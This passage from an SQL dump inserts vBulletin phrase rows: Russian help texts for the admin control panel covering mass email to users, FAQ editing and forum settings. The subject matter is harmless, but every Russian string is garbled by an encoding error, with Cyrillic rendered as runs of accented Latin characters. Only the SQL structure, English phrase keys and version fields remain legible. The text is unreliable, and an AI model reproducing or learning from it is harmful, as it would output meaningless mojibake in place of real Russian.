(22288, -1, 'email_genlist_start_ipaddress_text', 'cphelptext', 'Ââåäèòå â ýòîì ïîëå ÷èñëî äëÿ ïîèñêà ïî IP-à äðåñó. Ãòî ìîæåò áûòü ïîëÃûé IP-à äðåñ (Ãà ïðèìåð, 188.77.39.33) èëè ÷à ñòè÷Ãûé (Ãà ïðèìåð, 188.77.39).  ñëó÷à å ââîäà ÷à ñòè÷Ãîãî à äðåñà , ðåçóëüòà òîì ïîèñêà áóäóò ïîëüçîâà òåëè ñ ëþáûìè ÷èñëà ìè â ïîñëåäÃåì îêòåòå (áëîêå) IP-à äðåñà .', 'vbulletin', '', 0, ''),
(22289, -1, 'email_genlist_start_ipaddress_title', 'cphelptext', 'Ñîñòà âëÿþùèå IP-à äðåñà ', 'vbulletin', '', 0, ''),
(22290, -1, 'email_start_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû âûáèðà åòå êðèòåðèé, îïðåäåëÿþùèé, êîìó áóäóò îòïðà âëåÃû âà øè ïèñüìà . Ãòè êðèòåðèè îïèñà Ãû Ãèæå. \r\n Ó÷òèòå, ÷òî âñå êðèòåðèè ñîãëà ñîâà Ãû. Ã’.Ã¥. åñëè âû ââåëè ôðà ãìåÃò èìåÃè ïîëüçîâà òåëÿ è óêà çà ëè ãðóïïó ïîëüçîâà òåëåé, òî áóäóò Ãà éäåÃû ïîëüçîâà òåëè âûáðà ÃÃîé ãðóïïû ñ ñîâïà äåÃèåì â èìåÃè, Ãî ÃÃ¥ òå, ó êîãî ñîâïà ë òîëüêî îäèà êðèòåðèé.', 'vbulletin', '', 0, ''),
(22291, -1, 'email_start_title', 'cphelptext', 'Ìà ññîâà ÿ ðà ññûëêà ', 'vbulletin', '', 0, ''),
(22292, -1, 'email_start_test_text', 'cphelptext', 'Åñëè çäåñü óñòà ÃîâëåÃî \"Äà \", òî Ãà ñà ìîì äåëå Ãèêîìó ÃÃ¥ áóäåò îòïðà âëåÃî ïèñåì, Ãî äâèæîê ôîðóìà ïîâåäåò ñåáÿ òà ê, ñëîâÃî îÃè áûëè îòïðà âëåÃû, è ïîêà æåò âà ì, êîìó áûëè áû îòïðà âëåÃû ïèñüìà .', 'vbulletin', '', 0, ''),
(22293, -1, 'email_start_test_title', 'cphelptext', 'Ãðîñòî òåñò', 'vbulletin', '', 0, ''),
(22294, -1, 'email_start_perpage_text', 'cphelptext', 'Ãòî êîëè÷åñòâî ñîîáùåÃèé, êîòîðîå áóäåò îòïðà âëåÃî çà îäèà ðà ç. Ãîêà âû ÃÃ¥ çà ïóñòèòå ñâîé ñîáñòâåÃÃûé ñåðâåð, ðåêîìåÃäóåòñÿ ñòà âèòü ýòî çÃà ÷åÃèå Ãà 100 èëè ìåÃüøå. Äà æå åñëè âà ø ñåðâåð óæå çà ïóùåÃ, êðîìå ñëó÷à åâ, êîãäà îà ÃÃ¥ î÷åÃü ñèëüÃî çà ãðóæåÃ, âà ì ñëåäóåò îñòà âëÿòü ýòî çÃà ÷åÃèå îòÃîñèòåëüÃî Ãèçêèì.', 'vbulletin', '', 0, ''),
(22295, -1, 'email_start_perpage_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé, îòïðà âëÿåìûõ çà ðà ç', 'vbulletin', '', 0, ''),
(22296, -1, 'email_start_from_text', 'cphelptext', 'Ãòî à äðåñ îòïðà âèòåëÿ. Ãî óìîë÷à Ãèþ óñòà Ãîâëåà à äðåñ, óêà çà ÃÃûé êà ê à äðåñ âåáìà ñòåðà , Ãî âû ìîæåòå ââåñòè çäåñü ëþáîé à äðåñ, êà êîé çà õîòèòå.', 'vbulletin', '', 0, ''),
(22297, -1, 'email_start_from_title', 'cphelptext', 'Îò', 'vbulletin', '', 0, ''),
(22298, -1, 'email_start_subject_text', 'cphelptext', 'Ââåäèòå çäåñü òåìó ïèñüìà .', 'vbulletin', '', 0, ''),
(22299, -1, 'email_start_subject_title', 'cphelptext', 'Òåìà ', 'vbulletin', '', 0, ''),
(22300, -1, 'email_start_message_text', 'cphelptext', 'Ãòî ñîîáùåÃèå, êîòîðîå âû ïîñûëà åòå ñâîèì ïîëüçîâà òåëÿì.  ñîîáùåÃèè âû ìîæåòå èñïîëüçîâà òü ñëåäóþùèå ñïåöèà ëüÃûå ñëîâà èëè ïåðåìåÃÃûå, êîòîðûå ïðè îòïðà âêå ïèñüìà áóäóò çà ìåÃÃ¥Ãû ñîîòâåòñòâóþùåé êà æäîìó ïîëüçîâà òåëþ èÃôîðìà öèåé. \r\n$userid : ýòî èäåÃòèôèêà òîð ïîëüçîâà òåëÿ. Îáû÷Ãî, äëÿ ïîëüçîâà òåëÿ îà Ãè÷åãî ÃÃ¥ îçÃà ÷à åò, Ãî åñëè âû Ãà ïðèìåð, îòïðà âëÿåòå ïèñüìî, ñîîáùà þùåå ïîëüçîâà òåëÿì èõ ñïðà âî÷Ãûå ññûëêè, âà ì ïðèäåòñÿ âêëþ÷èòü èäåÃòèôèêà òîð ïîëüçîâà òåëÿ ñëåäóþùèì îáðà çîì: \r\nwww.mysite.com/myvb/index.php?referrerid=$userid \r\n÷òî äîáà âèò ïîëüçîâà òåëþ ñ óêà çà ÃÃûì ID î÷êî çà ïðèâåäåÃÃîãî Ãîâîãî ïîëüçîâà òåëÿ, åñëè êòî-òî ïðîñëåäóåò ïî ýòîé ññûëêå è çà ðåãèñòðèðóåòñÿ. \r\n$activateid è $activatelink ïðèìåÃèìû òîëüêî åñëè âêëþ÷åÃà îïöèÿ ïðîâåðêè à äðåñîâ ýëåêòðîÃÃîé ïî÷òû ïðè ðåãèñòðà öèè, à ïîëüçîâà òåëü âñå åùå ÃÃ¥ ïîäòâåðäèë ñâîé à äðåñ. $activatelink - ññûëêà , ÃóæÃà ÿ ïîëüçîâà òåëþ äëÿ à êòèâà öèè ñâîåãî à êêà óÃòà . $activateid èñïîëüçóåòñÿ, åñëè âû Ãà áèðà åòå ýòó ññûëêó âðó÷Ãóþ, èÃà ÷å â ýòîé ïåðåìåÃÃîé Ãåò Ãóæäû. \r\n$username : èñïîëüçóéòå ýòó ïåðåìåÃÃóþ, åñëè âû õîòèòå Ãà ïîìÃèòü ïîëüçîâà òåëþ åãî èìÿ èëè îáðà òèòüñÿ ëè÷Ãî ê Ãåìó. \r\n$email : ýòî à äðåñ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëÿ. Ãòà ïåðåìåÃÃà ÿ ïîëåçÃà , åñëè âû õîòèòå èñïîëüçîâà òü ïîäîáÃóþ ñòðîêó \r\nÃòî ýëåêòðîÃÃîå ïèñüìî áûëî îòïðà âëåÃî ïî à äðåñó $emailaddress, êîòîðûé áûë óêà çà à ïðè ðåãèñòðà öèè à êêà óÃòà Ãà ôîðóìå. \r\nÃîæà ëóéñòà , îáðà òèòå âÃèìà Ãèå Ãà òî, ÷òî âû ÃÃ¥ ìîæåòå îòïðà âëÿòü ïà ðîëè ïî ýëåêòðîÃÃîé ïî÷òå, ïîòîìó ÷òî òåïåðü îÃè çà øèôðîâà Ãû â áà çå äà ÃÃûõ. Åñëè õîòèòå, âû ìîæåòå Ãà ïðà âèòü ïîëüçîâà òåëåé Ãà ñòðà Ãèöó çà áûòûõ ïà ðîëåé, êîòîðà ÿ ðà ñïîëîæåÃà ïî à äðåñó \r\nhttp://www.yoursite.com/yourvb/login.php?do=lostpw', 'vbulletin', 'zCarot', 1219837553, '3.8.0 Alpha 1'),
(22301, -1, 'email_start_message_title', 'cphelptext', 'ÑîîáùåÃèå', 'vbulletin', '', 0, ''),
(22302, -1, 'faq_text', 'cphelptext', 'Ñïðà âêà : \r\nÑèñòåìà ñïðà âêè ýòîãî ôîðóìà ïîçâîëÿåò âà ì ñîçäà âà òü áåñêîÃå÷Ãî âëîæåÃÃûå òåìû è âîïðîñû, è äîïîëÃèòåëüÃî, ïîçâîëÿåò êîÃå÷Ãûì ïîëüçîâà òåëÿì èñêà òü ïî ñïðà âêå. Ñïðà âêà - ñïèñîê ÷à ñòî çà äà âà åìûõ âîïðîñîâ, òîãäà êà ê ñèñòåìà ñïðà âêè ýòîãî ôîðóìà ÿâëÿåòñÿ ÷åì-òî âðîäå ãèáðèäà ñïðà âêè è áà çû çÃà Ãèé, ò.ê. â Ãåé åñòü âîçìîæÃîñòü ïîèñêà . \r\n Ãî óìîë÷à Ãèþ â ñïðà âêå ôîðóìà äîáà âëåÃî Ãåñêîëüêî òåì è âîïðîñîâ, êîòîðûå îñâåùà þò èñïîëüçîâà Ãèè ôîðóìà ñ òî÷êè çðåÃèÿ êîÃå÷Ãîãî ïîëüçîâà òåëÿ. Âû ìîæåòå âêëþ÷èòü äîïîëÃèòåëüÃûå òåìû ñïðà âêè, êîòîðûå áóäóò ïîñâÿùåÃû èìåÃÃî âà øåé êîÃôèãóðà öèè - Ãà ïðèìåð, ïðà âèëà ôîðóìà . \r\n Ñèñòåìà ñïðà âêè òà êæå ïîääåðæèâà åò ìÃîãîÿçû÷Ãîñòü. Êà æäûé ýëåìåÃò ñïðà âêè ìîæåò èìåòü ïåðåâîä Ãà êà æäîì ÿçûêå èç óñòà ÃîâëåÃÃûõ ÿçûêîâ . Êîãäà ïîëüçîâà òåëü áóäåò çà ãðóæà òü ñòðà Ãèöó ñïðà âêè, äâèæîê ôîðóìà îòîáðà çèò çà ïèñè ñïðà âêè Ãà òîì ÿçûêå, êîòîðûé Ãà äà ÃÃûé ìîìåÃò âûáðà à ïîëüçîâà òåëåì.', 'vbulletin', 'zCarot', 1204936623, '3.7.0 Release Candidate 1'),
(22303, -1, 'faq_title', 'cphelptext', 'Ñïðà âêà ', 'vbulletin', '', 0, ''),
(22304, -1, 'faq_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü Ãîâûé âîïðîñ èëè òåìó ñïðà âêè. Ãèæå îïèñà Ãû îïöèè.', 'vbulletin', '', 0, ''),
(22305, -1, 'faq_add_title', 'cphelptext', 'Äîáà âëåÃèå âîïðîñîâ èëè òåì â ñïðà âêó', 'vbulletin', '', 0, ''),
(22306, -1, 'faq_add_product_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð óêà çûâà åò Ãà ïðîäóêò, ñ êîòîðûì ñâÿçà à äà ÃÃûé ïóÃêò ñïðà âêè. Âà ì ÃÃ¥ ñëåäóåò çà äóìûâà òüñÿ îá ýòîì, åñëè, êîÃå÷Ãî, âû ÃÃ¥ æåëà åòå ñîçäà òü êà êîé-òî ìîäóëü äëÿ ôîðóìà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22307, -1, 'faq_add_product_title', 'cphelptext', 'Ãðîäóêò', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22308, -1, 'faq_add_faq_text', 'cphelptext', 'Ãòî ñîêðà ùåÃÃîå Ãà çâà Ãèå ñïðà âêè è èñïîëüçóåòñÿ òîëüêî âÃóòðåÃÃÃ¥. ÃŽÃî ìîæåò ñîäåðæà òü ëà òèÃñêèå áóêâû, öèôðû è ñèìâîë ïîä÷åðêèâà Ãèÿ, Ãî Ãà ÷èÃà òüñÿ äîëæÃî ñ áóêâû.', 'vbulletin', 'zCarot', 1205940980, '3.7.0 Release Candidate 1'),
(22309, -1, 'faq_add_faq_title', 'cphelptext', 'Ãà çâà Ãèå ïåðåìåÃÃîé', 'vbulletin', '', 0, ''),
(22310, -1, 'faq_add_edit_faqparent_text', 'cphelptext', 'Ëþáîé âîïðîñ èëè òåìà ñïðà âêè ìîæåò áûòü ðîäèòåëüñêèì äëÿ äðóãîãî âîïðîñà /òåìû. Çäåñü óñòà Ãà âëèâà åòñÿ ðîäèòåëüñêà ÿ çà ïèñü äà ÃÃîãî âîïðîñà /òåìû.', 'vbulletin', '', 0, ''),
(22311, -1, 'faq_add_edit_faqparent_title', 'cphelptext', 'Ãîäèòåëüñêà ÿ çà ïèñü ñïðà âêè', 'vbulletin', '', 0, ''),
(22312, -1, 'faq_add_edit_deftitle_text', 'cphelptext', 'Ãòî âîïðîñ, ëèáî çà ãîëîâîê òåìû (åñëè ýòî òåìà ñïðà âêè). \r\n Åñëè ýòî âîïðîñ, òî â ïîëå \"Òåêñò\" äîëæåà ñîäåðæà òüñÿ îòâåò Ãà Ãåãî. Âîïðîñ ÃÃ¥ äîëæåà áûòü óÃèêà ëüÃûì âî âñåì ñïðà âêà ì, Ãî ëó÷øå, ÷òîáû ÃÃ¥ áûëî ïîõîæèõ èëè òà êèõ æå â ïðåäåëà õ îäÃîé òåìû ñïðà âêè, äà áû ÃÃ¥ ïóòà òü ïîëüçîâà òåëåé. \r\n Åñëè ýòî çà ãîëîâîê òåìû, îà äîëæåà êðà òêî îïèñûâà òü ñóòü âîïðîñîâ â ýòîé òåìå ñïðà âêè.', 'vbulletin', '', 0, ''),
(22313, -1, 'faq_add_edit_deftitle_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22314, -1, 'faq_add_edit_deftext_text', 'cphelptext', 'Ãòî îòâåò Ãà âîïðîñ (Çà ãîëîâîê), åñëè ýòî âîïðîñ ñïðà âêè; ëèáî îïèñà Ãèå òåìû, åñëè ýòî òåìà ñïðà âêè. Âà ì ïðèäåòñÿ èñïîëüçîâà òü çäåñü HTML ôîðìà òèðîâà Ãèå, ïîñêîëüêó ýòîò òåêñò áóäåò âûâåäåà êà ê åñòü.', 'vbulletin', '', 0, ''),
(22315, -1, 'faq_add_edit_deftext_title', 'cphelptext', 'Òåêñò', 'vbulletin', '', 0, ''),
(22316, -1, 'faq_add_edit_displayorder_text', 'cphelptext', 'Çäåñü îïðåäåëÿåòñÿ ïîðÿäîê, â êîòîðîì îòîáðà æà åòñÿ âîïðîñ âÃóòðè òåìû. Åñëè óêà çà òü çäåñü 0, òî çà ïèñü ñïðà âêè ÃÃ¥ áóäåò îòîáðà æà òüñÿ, õîòÿ âñ¸ ðà âÃî áóäóò äîñòóïÃû ïî òåêóùåìó à äðåñó.', 'vbulletin', 'zCarot', 1228216580, '3.8.0 Release Candidate 1'),
(22317, -1, 'faq_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(22318, -1, 'faq_add_edit_1_text', 'cphelptext', 'Ãîëÿ \"Çà ãîëîâîê\" è \"Òåêñò\" âûøå ñîäåðæà ò ñîîòâåòñòâåÃÃî âîïðîñ è îòâåò Ãà Ãåãî äëÿ ÿçûêà ïî óìîë÷à Ãèþ. Åñëè ó âà ñ Ãà ôîðóìå óñòà ÃîâëåÃû äîïîëÃèòåëüÃûå ÿçûêè, âû ìîæåòå ââåñòè ïåðåâîä âîïðîñà è îòâåòà Ãà êà æäûé èç óñòà ÃîâëåÃÃûõ ÿçûêîâ. Ãòî Ãåîáÿçà òåëüÃî, åñëè ïåðåâîä ÃÃ¥ óêà çà Ã, áóäóò âûâåäåÃû çÃà ÷åÃèÿ äëÿ ÿçûêà ïî óìîë÷à Ãèþ (âûøå).', 'vbulletin', '', 0, ''),
(22319, -1, 'faq_add_edit_1_title', 'cphelptext', 'ßçûêè', 'vbulletin', '', 0, ''),
(22320, -1, 'faq_delete_text', 'cphelptext', 'Ãòî ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ çà ïèñè Ñïðà âêè. Ãà æìèòå \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. \r\n Âñå äî÷åðÃèå îáúåêòû ýòîé çà ïèñè Ñïðà âêè áóäóò òà êæå óäà ëåÃû. Ãòà îïåðà öèÿ Ãåîáðà òèìà !', 'vbulletin', '', 0, ''),
(22321, -1, 'faq_delete_title', 'cphelptext', 'Óäà ëåÃèå çà ïèñè ñïðà âêè', 'vbulletin', '', 0, ''),
(22322, -1, 'faq_edit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò ðåäà êòèðîâà òü âñå îïöèþ âûáðà ÃÃûõ âîïðîñîâ è òåì ñïðà âêè. Ãèæå îïèñà Ãû îïöèè.', 'vbulletin', '', 0, ''),
(22323, -1, 'faq_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå çà ïèñåé ñïðà âêè', 'vbulletin', '', 0, ''),
(22324, -1, 'faq_modify_text', 'cphelptext', '×òîáû ïðîñìîòðåòü ñóùåñòâóþùèå òåìû ñïðà âêè, âûáåðèòå \"ÈçìåÃèòü\" ïîä çà ïèñÿìè ñïðà âêè â ïà Ãåëè Ãà âèãà öèè ñëåâà . \r\n Âû Ãà ÷èÃà åòå ñ âåðõÃåãî ëåâîãî óãëà ñïðà âêè.  ñà ìîì âåðõó Ãà ïèñà Ãî \"Ñïðà âêà \" - îà ðà ñêðûâà åòñÿ â Ãà âèãà öèîÃÃóþ ïà Ãåëü, êîãäà âû ñïóñêà åòåñü âÃèç ïî óðîâÃÿì. ×òîáû óâèäåòü ÃèæÃèå óðîâÃè, Ãà æìèòå Ãà ðîäèòåëüñêèé óðîâåÃü òîé çà ïèñè, êîòîðóþ âû õîòèòå óâèäåòü. Ãà ïðèìåð, ïîä \"Ñïðà âêà ïî ôîðóìó\", Ãà æìèòå Ãà \"Ãîääåðæêà ïîëüçîâà òåëåé\", ÷òîáû óâèäåòü ýëåìåÃòû, îòÃîñÿùèåñÿ ê ýòîé òåìå è äî÷åðÃèå òåìû (åñëè òà êîâûå åñòü). Èëè Ãà æìèòå Ãà \"Ñïðà âêà ïî ôîðóìó\", ÷òîáû óâèäåòü çà ïèñè, îòÃîñÿùèåñÿ êî âñåì òðåì åãî äî÷åðÃèì ðà çäåëà ì. \r\n Âû ìîæåòå ðåäà êòèðîâà òü ñâîéñòâà òåì è âîïðîñîâ, Ãà æà â Ãà \"ÈçìåÃèòü\" Ãà ïðîòèâ Ãà çâà Ãèÿ çà ïèñè. (Ñì. Ãåäà êòèðîâà Ãèå òåì è âîïðîñîâ ñïðà âêè ) \r\n Âû ìîæåòå äîáà âëÿòü äîïîëÃèòåëüÃûå òåìû èëè ïîä-òåìû. ×òîáû ýòî ñäåëà òü, Ãà æìèòå \"Äîáà âèòü\" â ïà Ãåëè Ãà âèãà öèè ñëåâà , èëè Ãà æìèòå \"Äîáà âèòü äî÷åðÃèé\" Ãà ïðîòèâ èìåÃè çà ïèñè, â êîòîðóþ âû õîòèòå äîáà âèòü Ãîâóþ çà ïèñü. (Ñì. Äîáà âëåÃèå òåì è âîïðîñîâ ñïðà âêè )', 'vbulletin', 'zCarot', 1205941222, '3.7.0 Release Candidate 1'),
(22325, -1, 'faq_modify_title', 'cphelptext', 'ÀäìèÃèñòðèðîâà Ãèå ñïðà âêè', 'vbulletin', '', 0, ''),
(22326, -1, 'forum_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃà çäåëû \r\nÃðà âà â ðà çäåëà õ \r\nÌîäåðà òîðû \r\nÃðîñìîòð ïðà â \r\nÃà çäåëû: \r\nÃûâà åò äâà âèäà ðà çäåëîâ, ýòî ðà çäåë è êà òåãîðèÿ.  ðà çäåëå ðà çðåøà åòñÿ äîáà âëåÃèå Ãîâûõ òåì è ñîîáùåÃèé, à â êà òåãîðèè - Ãåò. Êà òåãîðèè èñïîëüçóþòñÿ äëÿ òåìà òè÷åñêîé ãðóïïèðîâêè ðà çäåëîâ. Òåìà òè÷åñêèå ðà çäåëû îáû÷Ãî ñîçäà þòñÿ êà ê ïîäðà çäåëû êà òåãîðèè, ÷òîáû ñãðóïïèðîâà òü èõ ïî òåìå. \r\nÃðè äîáà âëåÃèè/ðåäà êòèðîâà Ãèè ðà çäåëà âû óâèäèòå îïöèþ, êîòîðà ÿ Ãà çûâà åòñÿ \"Âåñòè ñåáÿ êà ê ðà çäåë\". Êîãäà ýòà îïöèÿ óñòà ÃîâëåÃà â \"Äà \", ðà çäåë âåäåò ñåáÿ êà ê ðà çäåë. Êîãäà óñòà ÃîâëåÃî \"Ãåò\" - êà ê êà òåãîðèÿ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22327, -1, 'forum_title', 'cphelptext', 'Î ðà çäåëà õ', 'vbulletin', '', 0, ''),
(22328, -1, 'forum_add_text', 'cphelptext', 'Îïöèè ýòîé ñòðà Ãèöû îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(22329, -1, 'forum_add_title', 'cphelptext', 'Äîáà âëåÃèå ðà çäåëà ', 'vbulletin', '', 0, ''),
(22330, -1, 'forum_add_edit_title_text', 'cphelptext', 'Ãòî çà ãîëîâîê Ãîâîãî ðà çäåëà . Çäåñü âû ìîæåòå èñïîëüçîâà òü HTML, Ãî ó÷èòûâà éòå, ÷òî îà òà êæå áóäåò èñïîëüçîâà òüñÿ êà ê çà ãîëîâîê ñòðà Ãèöû. Ã’.ê. HTML-âñòà âêè ÃÃ¥ ðà çðåøåÃû â çà ãîëîâêà õ ñòðà Ãèö, îÃè áóäóò îòîáðà æåÃû êà ê ïðîñòîé òåêñò, è áóäóò âûãëÿäåòü ñòðà ÃÃî.', 'vbulletin', '', 0, ''),
(22331, -1, 'forum_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22332, -1, 'forum_add_edit_description_text', 'cphelptext', 'Ãòî îïèñà Ãèå îòîáðà æà åòñÿ ïîä Ãà çâà Ãèåì ðà çäåëà Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà , è Ãà ñòðà Ãèöà õ, ñîäåðæà ùèõ ñïèñêè ðà çäåëîâ (forumdisplay.php).', 'vbulletin', '', 0, ''),
(22333, -1, 'forum_add_edit_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', '', 0, ''),
(22334, -1, 'forum_add_edit_link_text', 'cphelptext', 'Åñëè âû ââåäåòå çäåñü URL, ðà çäåë, ïî ñóòè, ïåðåñòà Ãåò áûòü ðà çäåëîì. Âìåñòî ýòîãî îà ñòà Ãåò ïðîñòî ññûëêîé Ãà ââåäåÃÃûé âà ìè URL.', 'vbulletin', '', 0, ''),
(22335, -1, 'forum_add_edit_link_title', 'cphelptext', 'Ññûëêà Ãà äðóãóþ ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(22336, -1, 'forum_add_edit_displayorder_text', 'cphelptext', 'Çäåñü îïðåäåëÿåòñÿ ïîðÿäîê, â êîòîðîì îòîáðà æà þòñÿ ðà çäåëû. Åñëè âû óñòà Ãîâèòå çäåñü 0, ðà çäåë ÃÃ¥ áóäåò Ãèãäå îòîáðà æà òüñÿ, ïîëüçîâà òåëü ìîæåò ïîëó÷èòü äîñòóï ê Ãåìó, òîëüêî Ãà áðà â âðó÷Ãóþ URL ðà çäåëà .', 'vbulletin', '', 0, ''),
(22337, -1, 'forum_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(22338, -1, 'forum_add_edit_parentid_text', 'cphelptext', 'Åñëè âû õîòèòå ñäåëà òü ýòîò ðà çäåë ïîäðà çäåëîì äðóãîãî ðà çäåëà , âûáåðèòå ïîñëåäÃèé èç ñïèñêà .  ïðîòèâÃîì ñëó÷à å âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''),
(22339, -1, 'forum_add_edit_parentid_title', 'cphelptext', 'Ãîäèòåëüñêèé ðà çäåë', 'vbulletin', '', 0, ''),
(22340, -1, 'forum_add_edit_daysprune_text', 'cphelptext', 'Ñðîê, çà êîòîðûé áóäóò îòîáðà æà òüñÿ òåìû ïðè ïðîñìîòðå ðà çäåëà . ÇÃà ÷åÃèå, âûáðà ÃÃîå çäåñü, áóäåò èñïîëüçîâà òüñÿ äëÿ ãîñòåé è äëÿ ïîëüçîâà òåëåé, âûáðà âøèõ \"Ãî óìîë÷à Ãèþ Ãà Ôîðóìå\" â ñâîèõ Ãà ñòðîéêà õ. Ãîëüçîâà òåëè òà êæå ìîãóò ïîìåÃÿòü ýòîò ñðîê, èñïîëüçóÿ óïðà âëåÃèÿ âÃèçó ñòðà Ãèöû îòîáðà æåÃèÿ òåì ðà çäåëà .', 'vbulletin', '', 0, ''),
(22341, -1, 'forum_add_edit_daysprune_title', 'cphelptext', 'Äà âÃîñòü îòîáðà æà åìûõ òåì ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(22342, -1, 'forum_add_edit_defaultsortfield_text', 'cphelptext', 'Ãòî ïîëå îïðåäåëÿåò, ïî êà êîìó êðèòåðèþ ñëåäóåò ïî óìîë÷à Ãèþ ñîðòèðîâà òü òåìû ðà çäåëà . Ãîëüçîâà òåëè â ëþáîì ñëó÷à å ñìîãóò èçìåÃèòü ýòîò ïà ðà ìåòð, èñïîëüçóÿ óïðà âëåÃèå âÃèçó ñïèñêà òåì. \r\n \r\nÃîìÃèòå, ÷òîáû ñîðòèðîâà òü ïî îöåÃêå òåì, âîçìîæÃîñòü îöåÃêè äîëæÃà áûòü âêëþ÷åÃà â ýòîì ðà çäåëå. Åñëè æå âîçìîæÃîñòü îöåÃêè òåì áóäåò îòêëþ÷åÃà , òî òåìû â ðà çäåëå áóäóò ñîðòèðîâà òüñÿ ïî äà òå ïîñëåäÃåãî ñîîáùåÃèÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22343, -1, 'forum_add_edit_defaultsortfield_title', 'cphelptext', 'Ñïîñîá ñîðòèðîâêè ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22344, -1, 'forum_add_edit_defaultsortorder_text', 'cphelptext', 'Ãòî ïîëå îïðåäåëÿåò ïîðÿäîê ïî óìîë÷à Ãèþ ñîðòèðîâêè òåì â ðà çäåëå. Ãîëüçîâà òåëè â ëþáîì ñëó÷à å ñìîãóò èçìåÃèòü ýòîò ïà ðà ìåòð, èñïîëüçóÿ óïðà âëåÃèå âÃèçó ñïèñêà òåì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22345, -1, 'forum_add_edit_defaultsortorder_title', 'cphelptext', 'Ãîðÿäîê ñîðòèðîâêè ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22346, -1, 'forum_add_edit_showprivate_text', 'cphelptext', 'Åñëè \"Ãåò\", òî äà ÃÃûé ðà çäåë áóäåò ñêðûò îò ïîëüçîâà òåëåé, ó êîòîðûõ Ãåò äîñòóïà ê Ãåìó. Ãîëüçîâà òåëè ñ ïðà âà ìè äîñòóïà äîëæÃû çà éòè Ãà ôîðóì, ÷òîáû óâèäåòü ýòîò ðà çäåë. \r\n \r\nÅñëè æå âû âûáåðèòå îïöèè \"Äà \", òî ïîëüçîâà òåëè óâèäÿò äà ÃÃûé ðà çäåë, äà æå åñëè ó Ãèõ ÃÃ¥ áóäåò äîñòóïà Ãà ïðîñìîòð åãî ñîäåðæèìîãî. ÂîçìîæÃîñòü ïðîñìîòðà ñ÷¸ò÷èêà ñîîáùåÃèé îïðåäåëÿåòñÿ äâóìÿ îïöèÿìè \"Äà \". Åñëè Ãà ðà çäåëå ñòîèò ïà ðîëü, òî îà áóäåò ÿâëÿòüñÿ \"ñêðûòûì\" äî òåõ ïîð, ïîêà ïîëüçîâà òåëü ÃÃ¥ ââåä¸ò êîððåêòÃûé ïà ðîëü. \r\n \r\nÅñëè âû óêà æèòå çäåñü \"Èñïîëüçîâà òü ïî óìîë÷à Ãèþ\", òî äëÿ ýòîãî ðà çäåëà áóäóò èñïîëüçîâà Ãû ïà ðà ìåòðû, óêà çà ÃÃûå â Ãà ñòðîéêà õ îòîáðà æåÃèÿ ñïèñêà ðà çäåëîâ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22347, -1, 'forum_add_edit_showprivate_title', 'cphelptext', 'Îòîáðà æà òü ñêðûòûé ðà çäåë', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22348, -1, 'forum_add_edit_newpostemail_text', 'cphelptext', 'Ââåäèòå à äðåñà ýëåêòðîÃÃîé ïî÷òû òåõ, êòî äîëæåà áûòü óâåäîìë¸à î ïîÿâëåÃèè â ðà çäåëå Ãîâûõ ñîîáùåÃèé. Ãà çäåëÿéòå à äðåñà ïðîáåëà ìè, åñëè èõ Ãåñêîëüêî. ÃÃ¥ ðåêîìåÃäóåòñÿ óêà çûâà òü çäåñü à äðåñà ìîäåðà òîðîâ - âû ìîæåòå âûáðà òü, áóäåò ëè ìîäåðà òîð ïîëó÷à òü óâåäîìëåÃèå î Ãîâûõ ñîîáùåÃèÿõ â Ãà ñòðîéêà õ ïðà â ýòîãî ìîäåðà òîðà .', 'vbulletin', '', 0, ''),
(22349, -1, 'forum_add_edit_newpostemail_title', 'cphelptext', 'Àäðåñà ýëåêòðîÃÃîé ïî÷òû äëÿ óâåäîìëåÃèÿ î ïîÿâëåÃèè Ãîâûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
